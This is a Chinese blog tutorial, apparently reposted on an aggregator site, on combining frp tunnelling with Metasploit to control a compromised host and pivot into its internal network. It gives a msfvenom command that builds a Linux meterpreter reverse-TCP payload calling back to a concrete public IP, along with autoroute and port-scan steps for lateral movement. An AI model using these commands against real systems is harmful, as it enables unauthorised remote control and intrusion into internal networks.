美文网首页
MSF+FRP实现内网渗透

MSF+FRP实现内网渗透

作者: 无情剑客Burning | 来源:发表于2020-09-27 21:18 被阅读0次

    声明: 严禁用作非法目的,谢绝一切形式的转载。

    这里对介绍了如何通过frp进行内网穿透。本篇 文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。

    网络拓扑

    通过家庭kali主机,获取到肉鸡的meterpreter。

    frp配置

    frps

    frp服务器端配置文件frps.ini如下:

    使用了dashboard。通过dashboard可以查看frp服务器的状态。

    运行frps

    ./frps -c frps.ini

    frpc

    frp客户端配置文件frpc.ini如下:

    运行frpc

    ./frpc -c frpc.ini

    MSF

    生成木马

    通过如下命令生成木马,注意这里的LHOST是公网的ip,LPORT是上面frpc.ini的remote_port。这是最重要的地方。

    msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=47.92.90.25 LPORT=7002  -i 3 -f elf -o test_7002

    获取meterpreter

    注意这里的lhost是localip即127.0.0.1、lport是localport即5555。这里是端口进行了转发。

    获取路由信息

    run get_local_subnets

    自动添加路由

    run post/multi/manage/autoroute

    查看路由信息

    run autoroute -p

    注意这里的网关是session 1。

    扫描开放的端口

    使用auxiliary/scanner/portscan/tcp模块进行端口扫描。

    这些扫描大多数的噢没有nmap强大,但是nmap在这里不能直接使用,需要设置socks代理,后续文章会详细介绍如何通过nmap进行扫描。

    数据流

    在"肉鸡"出查看7002端口的数据流。

    在Kali中查看ip=47.92.90.25的数据流。

    公众号

    更多内容,欢迎关注我的微信公众号:无情剑客。

    相关文章

      网友评论

          本文标题:MSF+FRP实现内网渗透

          本文链接:https://www.haomeiwen.com/subject/grrjtktx.html